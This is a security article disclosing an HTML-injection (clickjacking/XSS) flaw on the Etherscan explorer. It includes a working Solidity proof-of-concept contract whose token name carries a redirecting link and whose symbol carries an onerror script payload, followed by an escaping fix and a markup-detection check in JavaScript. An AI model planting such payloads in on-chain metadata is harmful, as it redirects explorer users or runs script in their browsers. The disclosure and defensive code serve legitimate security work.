Etherscan clickjacking vulnerability

Category: Security articles

01

Vulnerability description

When a token contract that follows the ERC20 standard is deployed, its symbol and name are free-form strings chosen by the deployer. An `<a>` tag embedded in them is rendered as-is and replaces the explorer's own link markup.

When a user visits the page and clicks the contract name, they can be hijacked to an arbitrary website.

02

Vulnerability details

You need to deploy a contract that follows the ERC20 standard and, before visiting the contract page, send one transaction to it.

https://ropsten.etherscan.io/address/0x701300f2f2c171c8c7c09e0fa09d6706a4fc7cd6#tokentxns


exp:

```solidity
pragma solidity ^0.4.24;

// Minimal token-like contract whose name and symbol carry HTML payloads.
// Only the Transfer event is needed for the explorer to list it as a token;
// the full ERC20 interface is not implemented.
contract MyTest {
    mapping(address => uint256) balances;
    uint256 public totalSupply;
    mapping(address => mapping(address => uint256)) allowance;
    address public owner;
    string public name;
    string public symbol;
    uint8 public decimals = 18;

    event Transfer(address indexed _from, address indexed _to, uint256 _value);

    constructor() public {
        // name and symbol were rendered unescaped by the explorer
        name = "<a href=http://baidu.com>12321</a>";
        symbol = 'ok<img src=/ onerror=alert(1)> ';
        totalSupply = 100000000000000000000000000000000000;
    }

    // Emits a Transfer event so the explorer picks the contract up as a token
    function mylog(address arg0, address arg1, uint256 arg2) public {
        emit Transfer(arg0, arg1, arg2);
    }
}
```
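The explorer-side fix, as an added example that is not part of the original post or Etherscan's code: token name and symbol are attacker-controlled strings read from the chain, so they are escaped before being placed in HTML, and the short symbol field is additionally held to a conservative allowlist (a hypothetical policy). The sample metadata is the contract's own.

```javascript
// Escape the five characters that can change HTML context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Hypothetical display policy for the short symbol field: a conservative
// character set and a length cap, otherwise a neutral placeholder.
const SYMBOL_RE = /^[A-Za-z0-9 ._-]{1,16}$/;
function safeSymbol(symbol) {
  return SYMBOL_RE.test(symbol) ? symbol : '(unnamed token)';
}

// The vulnerable rendering: chain data concatenated straight into markup.
function renderTokenLabelUnsafe(name, symbol) {
  return `<span class="token">${name} (${symbol})</span>`;
}

// The hardened rendering: every untrusted value passes through escapeHtml.
function renderTokenLabelSafe(name, symbol) {
  return `<span class="token">${escapeHtml(name)} (${escapeHtml(safeSymbol(symbol))})</span>`;
}

// Constructed sample input: the name and symbol set by the contract above.
const SAMPLE_NAME = '<a href=http://baidu.com>12321</a>';
const SAMPLE_SYMBOL = 'ok<img src=/ onerror=alert(1)> ';

// Regression check for the template: after removing our own wrapper,
// does any tag or on*= handler remain in the output?
function containsInjectedMarkup(html) {
  const inner = html.replace(/^<span class="token">|<\/span>$/g, '');
  return /<[a-z!\/]/i.test(inner) || /\bon\w+\s*=/i.test(inner);
}

console.log('unsafe:', renderTokenLabelUnsafe(SAMPLE_NAME, SAMPLE_SYMBOL));
console.log('safe:  ', renderTokenLabelSafe(SAMPLE_NAME, SAMPLE_SYMBOL));
```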


This article was first published on the WeChat public account IDLab: Etherscan clickjacking vulnerability
